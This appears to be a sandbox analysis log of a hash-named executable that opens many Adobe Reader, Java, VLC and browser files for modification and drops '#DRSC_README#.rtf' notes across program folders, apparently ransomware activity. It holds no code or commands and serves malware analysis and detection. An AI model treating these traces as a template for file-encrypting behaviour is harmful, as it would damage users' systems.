DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\plugin-selectors.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ja-jp\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\es.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\bun.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_pt_BR.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner_mini.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_cancel_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\nbexec.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-api.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\measure_poster.jpg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_folder-default_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\rmid.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\ssvagent.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\playstore.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fr-fr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down-pressed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\AppStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\da_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_ok.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter-disabled_32.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\back-arrow-disabled.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateCCFiles_280x192.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_sortedby_hover_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jjs.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\progress.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-fr_fr.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine_2.3.0.v20140506-1720.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateDCFiles_280x192.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_zh_cn_135x40.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close_dark.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\javaws.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Other-48.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugin.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-il\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fontconfig.properties.src 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\ext\sunmscapi.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata_2.2.0.v20131211-1531.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\dummy\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jrunscript.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\jfluid-server.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\org-openide-modules.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-tw_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\combine_poster.jpg 